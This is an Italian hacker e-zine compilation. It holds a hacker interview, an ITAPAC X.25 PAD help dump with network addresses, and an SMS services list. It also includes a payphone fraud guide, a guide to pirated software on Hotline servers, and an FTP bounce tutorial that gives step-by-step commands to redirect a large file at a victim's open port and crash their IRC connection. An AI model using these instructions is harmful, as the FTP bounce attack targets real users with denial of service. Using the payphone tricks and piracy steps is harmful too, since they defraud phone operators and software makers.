<DaVinci> e a me non andava
COMMENTO FUORI INTERVISTA: e poi gli hacker non avrebbero un etica...
<DaVinci> ho passato anche due anni su galactica
<N0bodY88> poi cosa e' successo? non ti piaceva + crackare?
<DaVinci> no il fatto di crakkare richiedeva molto tempo
<DaVinci> e molta dimestichezza con prog relativi al crakkaggio
<DaVinci> percio' gia' conoscevo un'hacker Bombadil
<DaVinci> e lo seguii per circa sei mesi
<DaVinci> riuscii a capire come fungevano gli exploit e vari sendmail
<DaVinci> tutto cio' che puoi utilizzare per l'hackeraggio
<DaVinci> era il 1984
<DaVinci> quando una notte
<DaVinci> mi collegai e cercai di bucare un sistema
<DaVinci> in 10 minuti ero riuscito ad entrare in una rete itapac
<DaVinci> collegata a Banche
<DaVinci> mi stupii
<DaVinci> per il semplice fatto che riuscii ad entrare in un battibaleno
<DaVinci> il fatto e' che era una trappola
<DaVinci> ripeto che ero riuscito ad entrare
<DaVinci> solo che non conoscendo bene il sistema UNIX
<DaVinci> mi buttavo a caso
<DaVinci> conoscevo pochi comandi
<DaVinci> il tutto era durato circa 20 minuti il tempo di ritrovarmi
<DaVinci> a conversare con certa gente della polizia Postale
<DaVinci> ero diventato bianco come un cadavere
<DaVinci> mia madre che mi diceva che cosa potessi aver fatto...
<DaVinci> ed io che ripetevo niente niente
<DaVinci> :-)))
<DaVinci> insomma dopo tre ore di conversazione
<DaVinci> mi hanno riportato a casa
<DaVinci> sequestrato il pc completo di manuali e modem ecc. ecc.
<DaVinci> mi hanno pure detto
<DaVinci> che se ci riprovavo potevo finir male
<DaVinci> al momento mi chiedevo
<DaVinci> come mai non mi portavano dentro o qualche multa
<DaVinci> l'indomani aspettavo la notizia sul giornale
<DaVinci> contento del fatto
<DaVinci> ma invece quegli stronzi non dissero nemmeno una parola
<DaVinci> forse per la mala publicita
<DaVinci> cmq sta' di fatto che tutt'ora
<DaVinci> quando succede qualche evento del genere
<DaVinci> mi vengono a prendere e mi portano sul posto per
<DaVinci> capire in che modo possono aver bucato il sistema
<DaVinci> parlo sempre di banche
<DaVinci> conosco parecchi della gf che operano nel campo dell'informatica
<DaVinci> che danno la caccia a pirati o hackers
<DaVinci> solo che li ho visti all'opera una volta
<N0bodY88> secondo te sono bravi?
<DaVinci> in confronto il mio cane bekka piu' gatti di loro
<DaVinci> eheheheh
<N0bodY88> hihihihi
<DaVinci> eheheheh
<N0bodY88> hihihihi
<N0bodY88> dopo quel fatto ti 6 preso subito un altro computer?
<DaVinci> beh non subito, visto che mio padre mi aveva vietato l'uso
<DaVinci> in casa pero', c'era sempre il mio caro e vecchio amico HJ.
<N0bodY88> l'essere stato preso e' stato uno stimolo a migliorarti o a
<N0bodY88> lasciare stare?
<DaVinci> diciamo che piu' che stimolo, ebbi la consapevolezza di agire ma
<DaVinci> con cautela, tante volte ancora bucai sistemi, ma sempre con un
<DaVinci> occhio alla finestra...eheheheh
<N0bodY88> da quella volta hai + avuto problemi con pulotti et similari?
<DaVinci> ripeto che ogni tanto ricevo visite, poi ultimamente mentro ero
<DaVinci> on line, mi son visto pingare da uno strano ip,dopo una ricerca
<DaVinci> ho capito che ero in logstatus su un sistema di GF..
<N0bodY88> se in questo momento qualcuno ti chiedesse di fargli da guida per
<N0bodY88> diventare un cracker esperto, cosa gli risponderesti?
<DaVinci> Mah, sinceramente con i tempi che corrono adesso, gli direi di
<DaVinci> lasciar perdere, poi l'etica e' sempre in primo piano.
<N0bodY88> che so sai usare? che linguaggi conosci?
<DaVinci> Beh, i Sistemi operativi sono come le dita di una mano
<DaVinci> mentre i linguaggi sono una giungla, io personalmente
<DaVinci> uso W98, poi Nt4, e Linux , linguaggi Vb, C++, pascal.
<N0bodY88> quali sono i tuoi obbiettivi ora?
<DaVinci> Starmene un po' tranquillo, cercare di leggere cio' che mi sono
<DaVinci> perso in passato
<N0bodY88> i tuoi amici lo sanno quello che fai?
<DaVinci> Uno Solo, Hackerjack, gli altri pensano che sia solo un tecnico di
<DaVinci> computer, :-))
<N0bodY88> dicci qualcosa su di te, cosa vesti, come la pensi del mondo...
<DaVinci> Beh, sono sposato da un'anno e mezzo circa, mi vesto normalmente
<DaVinci> con jeans e camicia, e giacca e cravatta quando serve.
<DaVinci> Il mondo e' una scatola piena di risorse, dove ognuno di noi
<DaVinci> puo' accedervi, trattare male il mondo significa trattare male
<DaVinci> il tuo prossimo, l'unica cosa che il mondo non puo' darmi
<DaVinci> e' il mio passato.
<N0bodY88> adesso devo scappare
<N0bodY88> grazie 1000 della favolosa intervista concessami :))))
<DaVinci> E' stato un piacere, see you later Alligator :-)))
<N0bodY88> byez allora ø__ø
<DaVinci> See ya.....By 1984

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°ÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛ°°°ÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°²
²°°ÛÛ²²²ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ²²²²ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°²
²°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°ÛÛÛÛÛ°°°°ÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°²
²°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°ÛÛÛ°°°ÛÛ°°°°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°²
²°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛ°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ TELEFONARE GRATIS ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Telefonare Gratis

Autore: Fusyllo
Consumo: 1 lattina di CocaCola
Musica ascoltata: (la prima che mi viene) Sweetest Thing U2
Dedicato: a tutti quelli telefonare gratis

Allora cominciamo... Questa e' la prima volta che scrivo su una e-zine.
In Italia la possibilita' di telefonare gratis si sta' riducendo molto, infatti,
molte tecniche che per telefonare gratis non funzionano piu'! :-((
Il famoso trucco dello scotch, che consiste nell'attaccare sulla banda
magnetica dello scocth in modo che il telefono non possa scrivere pero' in
questo modo non potrebbe neanche leggere no?
La tessera passata su di un vecchio televisote? Non funzionera' mai ! Anche se,
la scheda, essendo magnetica, il televisore modifichera' molto probabilamente
il contenuto ma in che modo??
Altre balle sono: passare la scheda sulla testina di un registratore a bobine
o su quella del commodore64 con il pulsante REC premuto.
Si dice che la Telecoz abbia un enorme data base dove siano registrati tutti
i seriali delle schede e che l'importo della scheda non sia scritto sulla
scheda ma in questo database. Non credo che esista veramente; i primi telefoni
a scheda si poteva frekare spingeno il tasto di reset (non piu' accessibile)
con una scheda telefonica alla fine della conversazione in questo modo la
scheda usciva carica come prima perche' l'importo viene cancellato solo alla
fine della conversazione (quando si chiude la cornetta). Questo potrebbe
significare che non c'e' nessun database se non e' stato aggiunto in seguito!!

Queste tecniche funzionano tutte (almeno nel momento in cui scrivo):
1.Dovete prendere una scheda vuota (se piena caxxi vostri) e piegarla in quattro
in questo modo:

_____________________ ___________
| | | |
| | | |
| | | Dopo |
| Prima | |___________|
| |
| |
| |
|_____________________|

Trovate un telefono che vada ancora a monete. Osservando il vano da dove esce
il resto si nota che le monete non escono da sopra come si potrebbe pensare
ma dal lato sinistro del vano cosi' voi prendete la vostra scheda piegata in
quattro e la in filate nel buco, (vi potete aiutare con una pinza con il
beccuccio storto); in questo modo il resto non cadra' nel vano ma rimarra' nello
scivolo di sinistra.

____________________________________________________
| |
| |
| |
| | | |
| | | |
| | | |
| | | _________________ |
| | | | | |
| \ __\___| | |
| \ |SSSSSS| | |
| \ |SSSSSS| | |
| \|SSSSSS| | |
| -------|_________________| |
| S=scheda |
| |
| |
|____________________________________________________|


Cosi dopo qualche ora passate e ritirate la mancia.

2.Un altro modo per telefonare per molto tempo usando una tessera vuota e una
con solo 200œ e' questo: inserite la tessera piena e la scheda vuota il piu'
dentro possibile. Componete il numero e quando la tessera si esaurira' verra'
espulsa e il telefono cerchera' anche di ritirare la scheda vuota che terrete
ferma con un dito affinche' il telefono non la prenda, nel frattempo la
telefonata continua e voi parlate pagando solo 200, quando finite la conversazione
(se la finirete :-D) basta riagganciare la cornetta e ritirare le schede.

3.Questa tecnica dovrebbe fare in modo che la tessera entri piu' dentro del
dovuto facendo leggere la banda magnetica ma non facendola scrivere.
Dovete inserire la scheda carica e comporre il numero, senza fretta e con
attenzione a non far accavallare le schede, inseritene due vuote una dietro
l'altra. L'importo continuera' a scendere e siccome la tessera verra' scritta
solo alla fine della telefonata il telefono scrivera' su quella vuota.

Non tentate di farvi le monetine false, non funzioneranno, il telefono oltre
a riconoscere il peso e la dimensione riconosce anche la lega!!
Scordatevi anche la monetina con il filo perche' c'e' un sistema a ghigliottina
che una volta entrata la moneta non esce piu'.
Questo articolo per ora e' giunto a conclusione ma nel prossimo numero parlero'
ancora di phreaking.

Fusyllo@usa.net Fusyllo

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
NOTA DI N0bodY88 = questo articolo non parla propriamente di phreaking ma di
cose interessanti sul mondo dei telefonini e sulle loro
possibilita' infinte o quasi...ho deciso infatti di pubblicarlo
in questa sezione xche' x diventare phreakers bisogna conoscere
i telefoni e i cell e quindi...qui ci sono un po' di info ^__^
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
- -
_ FORSE NON SAPEVATE CHE ... _
_ _
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Una sera stando come al solito in rete sul canale #cybernet vidi apparire un
topic che pubblicizzava un url che desto' grande fermento ed interesse nel canale.
Vidi la gente che etichettava quest'url e il suo kontenuto kome "altamente lameh",
vidi righe di testo ke denigravano il concetto di guida all'hackin' per newbies
e wannabe vidi ankora gente che si permetteva di etikettare kome lamer gli
stessi editori della rivista...
Fui attratto da quell'url in cima alla finestra di cybernet che destava tanto
scalpore..
Lo andai a visitare e ne scarikai il kontenuto.
Ottenni infine un volume di pagine che si poneva l'obbiettivo di dare delucidazioni
su tutto cio' ke koncerne il mondo dei computers e della rete.
Lo stampai e lo lessi tutto pensando, alla fine, che rimaneva sempre un buon
tentativo di dare elucubrazioni (!!!!:)) su tutto cio' ke riguarda il "nostro mondo".
La dedussione fu semplice : questa puo' rimanere una rivista da lamers per tutti
koloro ke konoscono a fondo l'utilizzo della rete ma sikuramente non lo sara'
mai per koloro ke hanno ankora dei dubbi e ke vogliono imparare kualkosa
senza stare ore e ore a tradurre pallosi testi teknici in inglese... (di roba
italiana c'e' n'e' pokina...).
Bah...kontinuero' a scarikare questa rivista ogni volta che trovero' un'altra
nuova "issue" ...mi sembra ben fatta, sinceramente. (Complimenti.)
Mhhhh....mi sa ke ho perso di vista l'argomento principale dell'artikolo...
Va beh... rikomincio dal titolo:

FORSE NON TUTTI SANNO KE...

e' possibile avere informazioni su Finanza (servizi finanziari non la GdF!!!),
meteorolgia, risultati ed estrazioni dei gioki, astrologia, bioritmi, servizi
personali e ankora su Trasporti, Servizi Personali , E-mail , e Internet
...DIRETTAMENTE DAL VOSTRO CELLULARE!!!!
Come?!
Beh, adesso ve lo spiego :))

-----------
|Parte Uno|
-----------

La prima cosa da fare e' verifikare se il vostro telefonino e' abilitato alla
trasmissione degli SMS dal momento ke tutti i GsM sono in grado di inviarli
ma non tutti sono in grado di riceverli.
Se il vostro telefonino e' abilitato alla trasmissione di SmS, adesso dovete
configurarlo.
Sapete benissimo ke i menu' e le configurazioni variano da telefonino a telefonino
quindi, questa e' la procedura, e vedete di cavarvela da soli..

[1] Trovate l'area MESSAGGI nel vostro cellu
[2] Nelle impostazioni c'e' la voce CENTRO MESSAGGI al quale va attribuito
il numero +393359609600

Adesso il vostro cellu e' abilitato all'invio degli SmS

-----------
|Parte Due|
-----------

Adesso non vi resta che andare nell'area di invio dei messaggi (SmS) e
scrivere una delle parole chiave qui sotto elencate e poi inviare il tutto al
numero 2002.
Vi arrivera' dopo poki secondi uno skuillo che dovrebbe riportare (come
messaggio) le info da voi richieste. :))

SERVIZI ECONOMIKO-FINANZIARI

BORSE ---->Aggiornamento sugli indici di borsa azionari
CAMBI ---->Informazioni sui cambi tra moneta e moneta
FIN ------>Aggiornamento notiziari economiko finanziario de "Il sole 24 Ore"
METALLI -->Quotazioni di oro e argento
MIB ------>Aggiornamenti per tutti i titoli trattati dalla Borsa di Milano

SERVIZI INFORMATIVI

MARI --->Aggiornamenti e previsioni meteo per i mari italiani
METEO -->Previsioni del tempo delle principali localita' italiane
NEVE --->Info sull'altezza della neve nelle principali lokalita' sciistike italiane
NEWS --->Ricezione dei notiziari ANSA (titoli principali)

RISULTATI ED ESTRAZIONI

CALCIO -->Risultati parziali e finali partite in schedina ed altre info
ENALOTTO,LOTTO,TOTIP,SCHEDINA,TRIS,TOTOGOL-->colonne vincenti dei rispettivi giochi

(Ho messo tutte le parole chiave insieme per evitare inutili ripetizioni e
perdite di tempo) :)) [NATURALMENTE ogni parola E' una parola chiave...Non mi
dite che avete scritto tutta la riga????]

SERVIZI PERSONALI

ASTRI-->Oroskopo del giorno (wow!)
BIO---->Aggiornamento del proprio bioritmo giornaliero (scommetto ke non
sapete cosa e' vero?)
MEMO--->Consente di inviare al proprio telefonino un messaggio in tempo
differito

TRASPORTI

AEREI,TRENI-->Orari ufficiali di partenza e arrivo (per i treni solo Eurostar
e Intercity)

SERVIZI PROFESSIONALI

ANSA-->Come per NEWS dal quale differisce per il numero di notizie ricevibili
con un unika rikiesta

INTERNET (!!!:)

E-MAIL-->Invio di E-Mail dal vostro cellu


----------------------------------MA KUANTO KOSTA????--------------------------
Per gli abbonati il kosto e' di 195lire + iva per ogni SmS inviato dall'italia.
Per le Carte rikarikabili il kosto e' di 200 lire (iva inklusa) per ogni Sms
inviato dall'Italia.
-------------------------------------------------------------------------------

For more info's go to :http/www.scriptim.it

Un saluto speciale a N0BodY88 che ha creduto in me per questo artikolo.

-----------------------------UNA MIA DOMANDA---------------------------------

Mi piacerebbe sapere se per caso c'e' in giro kualke programma che consenta di
cambiare a piacimento le ikone di altri programmi...
Una volta ho sentito di un programma che si kiamava "Mikelangelo98" mi pare...
Altra domanda: Ho sentito in giro che esiste un modo per far accettare sempre
e comunkue qualunkue file a kualnunkue utente...
Ne sapete qualkosa?
Per informazioni riguardo il mio artikolo, le mie domande, consigli e suggerimenti
vari mandate una mail a Limbo59@hotmail.com

Un salutone a tutti i komponenti del NewBies Staff...

]Akuma[

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COSA C'E' DIETRO AI GREEN??? ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

I GRRENZ sono BELLISSIMI guardiamo il sistema che ci puo' stare dietro


167821090
4800 HPN Milan pad #5 inhouse p30.
MOTOROLA SERVICE PRODUCTION

enter 'h' or 'help' followed by a topic.
possible topics are:
xtypes
x28cmds
x3parms
mnemonics
profiles
rpoa
help


sym = "31366600101*``sym"
trace = "1000*``trace"
als = "31360070001111\\31360050001111"
geis = "31360070001111\\31360050001111"
MKIII = "31367104106800\\31360254106800\\31360154106800"
ppp = "p256,w2,31367112478701\\p256,w2,31360246478701"
FMILN011 = "L"
FFRNZ061 = "3136661906198"
FMILN012 = "3136661901298"
FPADU021 = "3136661902198"
FBOLO041 = "3136661904198"
FNPLI081 = "3136661908198"
FGNOA051 = "3136661905198"
FTURN031 = "3136661903198"
FMILN013 = "3136661901398"
FMILN014 = "3136661901498"
FMILN015 = "3136661901598"
FMILN016 = "3136661901698"
FMILN019 = "3136661901998"
FMISG091 = "3136661909198"
FMADR011 = "3136770901198"
press <cr> to c
ADR012 = "3136770901298"
FMADR013 = "3136770901398"
FBARC021 = "3136770902198"
FBARC022 = "3136770902298"
FBILB031 = "3136770903198"
FMILN017 = "3136661901798"
FMILN018 = "3136661901898"
FROME071 = "3136661907198"
FROME072 = "3136661907298"
secure = "p256,w2,31367112478703\\p256,w2,31360246478703"
internal = "p256,w2,31360246874601\\p256,w2,31360256874601"
= ""
FBAHR131 = "31367121040132"

available x3 and x28types are:
pci c76 c80 c84 telenet datapac
micom dynapac telepac amdahl telematics hughes
otc dcall pacnet
Countout.

*h x28cmds

Available commands are:
call : retry previous clr : clear call copyclr: clear copy call
copy : copy data call c : make call help : help
h : help iclr : send inv clear intd : int & discard
int : send interrupt logoff : disconnect device menu : disply menu
npar : network parity par : display x3 prof : change profile
reset : reset circuit rpar : show remote x3 rprof : chg remote prof
rset : set remote x3 send : send data set : set x3
stat : show status tactt : channel test tact : channel test
type : type string x28type: change x28type x3type : change x3type

call request example:
[c] a,r,t4,p128,w(3),d(9600,4800),s-12345*userdata

examples of available facilities are:
g12 = cug o12 = oacug r = rev f = fastsel
fr = fastres t1234 = rpoa w3 = wsze p128 = psze
d9600 = thruput s = reselection prevention a = accounting

help
*h x3parms

1 pad recall 2 echo 3 forwarding char
4 idle timer 5 flow control dev 6 service signals
7 break action 8 discard output 9 cr padding
10 line folding 11 speed 12 flow control pad
13 lf insertion 14 lf padding 15 edit
16 char delete 17 line del 18 line display
19 editing signals 20 echo mask 21 parity treatment
22 page wait 0 national marker 23 data forwarding 1
24 data forwarding 2 25 output pending 26 interval timer
27 padding after tab 28 xon char to device 29 xoff char to device
30 xon char to pad 31 xoff char to pad 32 forward char. count
*
?logout=disconnette
CALL Call previous address
CALL ? Display previous address
Cxx call parameters Call using specific port
COPYA nn Copy input/output to port
COPYH nn Copy output to port
COPYC nn Redirect output to port
COPYI nn Copy input/redirect output
CLR Clear a virtual circuit
HELP or ? Display X.28 commands
HELP E or ? E Display extended commands
INT Send interrupt packet
KCOPY Terminate local copy
LOG Log out of X.28
PAR? parameter #1, parameter #2, ... Display X.3 parameters
PAR? Display all X.3 parameters
PROF Display current profile
PROF [profile #] or [profile name] Change to specified profile
PROF ? Display available profiles
RESET Send reset packet
SET parameter #1:value, parameter #2:value, ... Set X.3 parameters
SET? parameter #1:value, parameter #2:value, ... Set/display X.3 parameters
STAT Display channel status

bello no.... hihihi a me pare carino
ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°°°°ÛÛÛÛ°°°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°²
²°°°°°°°°°ÛÛÛÛÛÛ°°°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ HOTLINES QUESTO SCONOSCIUTO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Salve, sono un utilizzatore di PC dal lontano 1978 e quindi penso di
essere uno dei piu' anziani di questo gruppo di pazzi scatenati (intendo
bonariamente!!! non prendetevela subito eheheh). Sin dal 1982 utilizzo computer
della Apple ed anche oggi vi sto scrivendo con il mio bel Macintosh che ritengo
ancora oggi il miglior compromesso fra hardware e software che si possa trovare
in commercio a prezzi ragionevoli. Volevo parlarvi del circuito di Hotline in
quanto ho visto che gli utilizzatori di wintel non lo conoscono. Vi chiederete,
cosa e' Hotline? In poche parole e' un sistema di server e client, a cui ognuno
puo' accedere con il programma chiamato appunto Hotline client. Cosa si trova
su tale circuito? Praticamente di tutto, esistono i server di software huose
ufficiali quali la Apple Inc., la Alladin ecc. e server cosiddetti pirati sui
quali si trova di tutto, dai famosi mp3 (brani musicali) a programmi warez
(software commerciali piratati), shareware, freeware, ai famosi crack e number
(numeri di serie e crack per programmi commerciali e non che di solito siete
abituati a reperire su astalavista) ed altro ancora. Dove posso reperire il
programma Hotline client? Basta andare su www.hotlinesw.com e scaricarlo,
per piattaforme wintel mi sembra che siamo arrivati alla versione beta7
mentre per Mac siamo alla versione 1.5 ed oggi esiste anche una preview di
un altro client chiamato Carracho sviluppato da un ottimo programmatore
italiano che da la possibilita' di poter accedere agli stessi server.
Una volta scaricato il programma esso da la possibilita' di connettersi ad
un server per 5 minuti fino a che non e' stato registrato, ma questo penso
che non sia un problema per nessuno di Voi, altrimenti mi potrete scrivere
e pensero' io a fornirvi il Vostro numero di serie personalizzato almeno non
avrete piu' alcun limite di tempo. A questo punto dovrete andare nelle option
e cambiare il tracker che viene proposto, salvare e chiudere il programma e
quindi riaprirlo altrimenti la variazione non viene effettuata, in quanto
con quello di serie vi vengono tracciati solo server commerciali o che
offrono solo prodotti shareware o freeware e penso che Voi vogliate qualche
cosa di piu'!!! Ebbene, andate su http://www.troutmask.com/#TRACKERS e qui
potrete vedere quali sono i tracker attivi in quel momento e quindi scegliere
quello che piu' vi aggrada e una volta che vi verranno visualizzati nella
finestra "Trached Servers" i server attivi fare doppio click su quello che
piu' vi piace, quindi premere il pulsante "Files" che vi aprira' una nuova
finestra che vi fara' vedere il contenuto del server ed ora che siete dentro
potete effettuare il download di quello che vi manca. Una cosa molto
importante e' leggere le news di quel server premendo l'apposito pulsante,
in quanto non tutti i server sono completamente free, ovvero in tanti vi e'
una cartellina chiamata request e qui dentro vi sono i nomi dei programmi
che l'amministratore del server vuole in cambio dell'account che vi concedera',
fate l'upload di un programma richiesto e poi postategli il nome del
programma che gli avete scaricato, il vostro nickname (anche questo modificabile
nelle option), la userID che avete scelto e la password e vedrete che di norma
entro 24/48 ore avrete pieno accesso ad effettuare il download dei programmi
che vi interessano. Vi sono anche server che vi indirizzeranno su delle
pagine www e qui vi chiederanno di premere un banner che vi portera' ad un
altro sito (di solito pornografico) e la xx parola sara' la vostra userID e
quindi sempre dal sito iniziale premere un altro banner che vi portera' ad un
altro la cui xx parola sara' la vostra password e cosi' potrete entrare nel
server e quindi effettuare il download dei programmi in esso contenuti; di
solito in questi casi la userID e la password cambiano tutte le settimane.

Spero di essere stato abbastanza chiaro e comunque resto a Vostra
completa disposizione per ogni chiarimento, scrivetemi su lnemesis@freemail.it.

Nemesis

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ FTP BOUNCE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Salve a tutti probabilmente conoscete gia la tecnica dell ftp bounce
Tuttavia ho pensato di scrivere questo breve articolo per coloro
che non hanno mai usato questo sistema.
dunque quello che vi serve e' un server ftp un po vecchiotto
provate quindi nelle varie universita (non quelle italiane mi raccomando)
bbs siti ftp di provider locali ,dopo aver immesso user a pass
provate a scrivere
"quote port x,x,x,x,0,25"
dove la x spero lo abbiate capito da voi sarebbe l'ip del computer
vittima
e il numero 25 equivale alla porta del computer vittima in questo caso la
smtp. se vi risponde QUOTE PORT COMMAND SUCCESFUL; siete a posto
ora potete usare questo server per dirottare la connessione su di un altro
computer :)))
un esempio di quello che si puo fare con questa tecnica potrebbe essere
mandare in crash un utente in irc provando a mandargli un file di grandi
dimensioni (ovviamente dovreste prima fargli uno scanner delle porte
aperte per vedere dove dirottare il file)
ESEMPIO:
ce' un tizio con ip 178.166.45.34 che non vi va a genio
cosa fare? per prima cosa fate partire un port scanner e individuate le
porte aperte,supponiamo che troviamo la 139 aperta dunque ora andremo nel
nostro sito ftp base con ip 123.75.223.8. e scriviamo
User:ftp
pass:ftp@ftp.com
guest login ok .
andiamo nella directory dove ci sono file molto grandi
cd /pub
facciamo un bel dir per vedere i file
ne scegliamo uno molto grande
e ora dirottiamo la connessione
quote port 178,166,45,34,0,139
quote retr nomefilegrande
fatto il server mandandera' il regalino alla vostra vittima col suo ip :))
questo e' un esempio di quello che si puo fare naturalmente ci sono altre
tecniche dell ftp bounce molto piu sofisticate tuttavia per farle
bisogna poter uploadare i file e non tutti i server ti permettono di
farlo e quelli che ti permettono l'upload magari sono senza bug
comunque il sistema e' lo stesso
e' sufficente crearsi un file di comandi uplodarlo al server base a da li
ridirgerlo sul computer vittima.
